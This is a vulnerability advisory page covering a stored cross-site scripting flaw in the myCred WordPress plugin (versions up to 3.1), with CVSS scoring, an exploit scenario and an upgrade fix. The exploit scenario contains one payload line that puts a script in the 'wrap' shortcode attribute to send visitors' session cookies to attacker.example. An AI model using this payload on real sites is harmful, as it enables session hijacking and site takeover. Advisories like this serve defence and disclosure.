Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
PR:L confirmed by contributor requirement; UI:R reflects that a victim must visit the injected page for payload execution; S:C and C:L/I:L capture cross-browser session impact with no availability consequence.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program - myCred plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wrap' Shortcode Attribute in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored XSS in the myCred WordPress plugin (versions up to and including 3.1) allows authenticated attackers holding contributor-level access or above to inject persistent JavaScript payloads via the unsanitized 'wrap' shortcode attribute in the leaderboard shortcode handler. When any user - including administrators - visits a page containing the injected shortcode, the payload executes in their browser, enabling session hijacking or privilege escalation. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The attacker must hold an authenticated WordPress account assigned the contributor role or higher (Editor, Author, Administrator). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 6.4 score (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) reflects a network-reachable, low-complexity attack requiring only low privileges and resulting in Changed Scope - the XSS payload executes in a different security context (the victim's browser) than where it was injected. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers or compromises a contributor-level account on a WordPress site running myCred ≤ 3.1, then creates a new post containing a myCred leaderboard shortcode with a JavaScript payload embedded in the 'wrap' attribute (e.g., `[mycred_leaderboard wrap="<script>document.location='https://attacker.example/steal?c='+document.cookie</script>"]`). Once the post is published or saved as a draft that an administrator previews, the stored script fires in the administrator's browser, exfiltrating their session cookie and enabling the attacker to take over the site with full administrative privileges. … |
| Remediation | Update the myCred WordPress plugin to version 3.1.1 or later; this is the vendor-released patch as evidenced by WordPress plugin trac changeset 3572451 and modified code visible in the 3.1.1 repository tag at `includes/classes/class.query-leaderboard.php` and `includes/mycred-functions.php`. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37562